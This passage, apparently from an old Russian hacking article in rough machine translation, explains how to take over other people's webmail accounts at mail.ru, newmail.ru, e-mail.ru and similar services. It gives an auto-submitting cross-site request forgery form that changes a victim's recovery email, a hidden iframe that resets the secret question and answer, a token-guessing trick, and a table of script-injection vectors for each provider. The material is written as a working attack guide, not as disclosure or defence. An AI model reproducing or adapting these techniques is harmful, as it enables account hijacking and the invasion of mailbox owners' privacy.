However, the GET method cannot change settings in the mail.ru box, therefore I will describe the technical side of the issue in detail.
I. We send a letter with a code to the necessary box with a code that will generate a frame directly in the body of the letter with a link to our website. If possible, the script should work without any user interaction (click, click, mouse over, image loading, etc.):
Ii. On the http://yoursite.ru resource we place an HTML document with the form for sending the changed data to the mail.ru server.
<form method = "post" action = "http://win.mail.ru/cgi-bin/anketa" name = "anketa"> <br> <input type = "hidden" name = "page" value = "2"> <br> <input type = "hidden" name = "Email" value = "firstname.lastname@example.org"> <br> <input type = "hidden" value = "Save" name = "Save"> <br> </ form> <br> <script> <br> document.anketa.submit (); <br> </ script>Notes: the work of the client part of the script in unchanged form is guaranteed only for IE; The dispatch form is placed on a separate site specifically to “unload” the letter.
We implement the script through the style tag.
Address of the settings page: http://mail01.mail.com/scripts/common/genprofile.cgi
Form Name: profileform
The name of the text field with a secret answer: hint_a
WWW.NEWMAIL.RUIn my opinion, quite a popular mailer, so I will tell about it in detail. Moreover, it is much easier to get someone else’s account on it than it seems at first glance. You can do this: send an email with a script that, when launched, will receive the session id , generate the necessary requests, and change the settings for the altrenative email (to which the password will be sent later) and the secret question and answer. However, if you specify any other address when reminding you, the password will be sent to it, if only the secret answer is correct. And the following observation: the session id to change the settings can not be used at all. Plus, any tags are allowed. All of the above reduces the amount of code to a couple of lines:
<iframe src = http: //newmail.ru/users/chpass.dhtml? cp_msg = 1 & cp_quest = QUESTION & cp_answ = ANSWER width = 0 height = 0> </ iframe>
The hacking method of e-mail.ru somewhat does not fit into the general theme of the article, but still - mail . When I needed to get a password from one mailbox, I normally registered my account and began to investigate the system. The first thing that caught my eye was the ability to set a new password and a secret question with an answer, without entering the old password. The usual action plan: check the tag filtering, get the ID and execute the request. However, to change the settings, the special variable utoken was used, which is contained in the body of the document. Experimenting with changing the question and answer with the previously known utoken:
I came to concludes that ID and cookies are not required to change the settings. At the same time, after observing utoken, it was found that the four-digit hexadecimal number after the email address email@example.com lies in a very narrow range. Namely, in order to establish a secret question with an answer on any box of interest to us, it is necessary to go through a total of 7 options: 5a00 , 5b00 , 5c00 , 5d00 , 5e00 , 5f00 , 6000 . When the number is guessed, we get into the right box.
Notes: at the moment there have been some changes. The password recovery service does not work, so it makes sense to change it immediately. Address change settings also changed:
The method does not work forever. Probably, it is still required that the user from time to time went to the mail via the web .
Table with the characteristics of free WWW-servers
inbox.ru , bk.ru , list.ru ,
email.com , post.com , myself.com , consultant.com , etc.
nm.ru , hotmail.ru , orc.ru , nightmail.ru
|Any way||Read / change question and answer. Password is valid|
| www.netman.ru and www.mailgate.ru
same mailer. about 80 domains
|www.yandex.ru||OnError, OnLoad||Deleting site * .narod.ru (JS is not required)|
|www.ukr.net|| embed src = javasc
ript: this .wav>
|Read the answer to your secret question.|
xaker.ru , email.su , russian.ru , students.ru , programist.ru , designer.ru , mail2k.ru ,
pochta.ru , pisem.net , fromru.com , land.ru , and others.
|In many ways||Account deleting|